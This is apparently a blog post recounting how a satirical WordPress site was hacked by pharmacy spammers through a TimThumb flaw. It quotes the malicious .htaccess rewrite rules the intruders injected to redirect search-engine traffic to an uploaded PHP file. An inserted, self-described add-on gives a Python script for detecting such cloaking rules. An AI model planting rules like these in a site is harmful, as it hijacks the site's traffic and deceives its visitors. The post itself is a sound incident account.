Hacked and mangled -- yet again

For the second time in two years my WordPress site was hacked, this time by Viagra spammers. Here are a few of the hard lessons I learned.

The price of living on the InterWebs is that eventually you’re going to get hacked. And the longer you stay on the InterWebs, the more likely you’ll get hacked again. So it is with eSarcasm, the not-quite-award-winning satirical site I co-author with my partner in juvenility, JR Raphael.

A few weeks ago I was searching for something on eSarcasm and discovered that Google’s search results looked extremely disconcerting. The URLs were correct, but instead of the usual snarky headlines, two sentence excerpts, and page previews, Google had apparently substituted text like "Buy real viagra - Approved Online Pharmacy: always 10% off for all reorders, free samples for all orders, 100% quality, low prices, 24/7 support..."

It looked something like this:

[Screenshot: eSarcasm results in Google, cropped, with the Viagra pharmacy text in place of the real excerpts]

When did eSarcasm become an online pharmacy, exactly? And if we are hawking bogus Viagra, shouldn’t we be making more money?

Clicking through the search results produced either an error message or a redirect to a pharmacy site, even though plugging the correct URL into the browser produced the page that was supposed to be there. The redirect only happened from within Google results.

It turns out that some Viagra spammer/hackers did quite a number on us. For one thing, they gained access to our WordPress directories and uploaded several bogus PHP files. They also added the following bits of extra code to our .htaccess file:

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo)
RewriteBase /
RewriteCond %{THE_REQUEST} /
RewriteCond %{REQUEST_URI} !/conf\.php
RewriteRule .+ cgi-bin/conf.php [L]

That’s what poleaxed our Google search results. Digging deeper, I turned up other folks who’d gotten nailed in similar ways, including a former tech reporter for the New York Times and the co-founder of one of the world’s most successful social networks. At least we were in good company.
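As an added, defender-side illustration (not code from the original post or from any tool it mentions), here is a small Python checker that parses an .htaccess file and flags any RewriteRule whose conditions key on a search-engine referer or crawler user-agent, which is exactly what the injected block above does. The sample file is constructed from that block plus WordPress's stock rewrite rules, which should not be flagged.

```python
import re

# Constructed sample: the injected block quoted in the post, followed by the
# stock WordPress rewrite block that a clean .htaccess normally contains.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo)
RewriteBase /
RewriteCond %{THE_REQUEST} /
RewriteCond %{REQUEST_URI} !/conf\\.php
RewriteRule .+ cgi-bin/conf.php [L]

# BEGIN WordPress
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
"""

# Crawler / referer names commonly used by cloaking redirects (assumed list).
SEARCH_ENGINES = re.compile(r"google|yahoo|bing|aol|msn", re.I)


def find_cloaking_rules(htaccess_text):
    """Return (rule_line, reason) for every RewriteRule whose preceding
    RewriteConds match HTTP_REFERER or HTTP_USER_AGENT against a search
    engine. Ordinary rules, like WordPress's own, produce no finding."""
    findings = []
    conds = []  # RewriteCond lines accumulated for the next RewriteRule
    for raw in htaccess_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if parts[0].lower() == "rewritecond" and len(parts) >= 3:
            conds.append((parts[1], parts[2]))
        elif parts[0].lower() == "rewriterule":
            suspicious = [
                f"{var} matched against {pat!r}"
                for var, pat in conds
                if var.upper() in ("%{HTTP_REFERER}", "%{HTTP_USER_AGENT}")
                and SEARCH_ENGINES.search(pat)
            ]
            if suspicious:
                findings.append((line, "; ".join(suspicious)))
            conds = []  # a RewriteRule consumes the conditions before it
    return findings


if __name__ == "__main__":
    for rule, why in find_cloaking_rules(SAMPLE_HTACCESS):
        print(f"SUSPICIOUS: {rule}\n  because: {why}")
```

Run it against a site's real .htaccess by passing the file contents to find_cloaking_rules; a flagged rule that targets a PHP file nobody on the team put there is the signature of the redirect described above.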

Regular readers of TY4NS will remember this is not the first time eSarcasm was hacked. Back in September 2010 the site fell victim to a vulnerability that allowed bad guys to serve up ‘malvertising’ – bogus ads that installed malware on visitors’ machines. The flaw was in OpenX, a plug-in we used for rotating banner ads. OpenX had patched that hole shortly after it was discovered, but didn’t deign to notify us about the bug or the fix, so we got creamed.

Fortunately for us, our Web host Doreo quickly identified the cause and fixed that vulnerability within a few hours. This time the cause and the fix were a little harder to suss out.

We ended up paying Code Garage to scan our site and remove the malicious code. They pointed the finger at TimThumb, a WordPress utility that automatically produces thumbnail images for site landing pages. Last August a zero-day vulnerability in TimThumb allowed hackers to execute their own PHP code on any site that was running it. As it turns out, the WordPress theme we bought for the site employs pieces of TimThumb code – including the flaws that were exploited.

Now we have to wait for the spammy search results to evaporate from Google’s cache before everything returns to normal.

Why did hackers do this? Odds are eSarcasm was simply part of a bundle of redirected traffic that was bartered on underground exchanges for a few pennies per page view, says Paul Henry, security and forensics analyst for Lumension, an endpoint management and security firm.

Even if you religiously update your WordPress installation (and we’re generally pretty good about that), you may still be vulnerable thanks to some easily hackable plug-in, says Henry.

“My best recommendation for keeping your site secure is to gain tight control over any extensions for your WordPress installation and disable any you don’t truly need,” he says. He also suggested hiring an outside firm to periodically scan the site and validate each page several times a day.

Henry said the hacking problem is so insidious and pervasive even well-known tech security pros have fallen victim, much to their embarrassment. I asked Henry if it had happened to him.

“To date I have not been embarrassed,” he says. “I’ve been lucky.”

Wish we could say the same.

Got a question about social media? TY4NS blogger Dan Tynan may have the answer (and if not, he’ll make something up). Visit his snarky, occasionally NSFW blog eSarcasm or follow him on Twitter: @tynan_on_tech. For the latest IT news, analysis and how-to’s, follow ITworld on Twitter and Facebook.
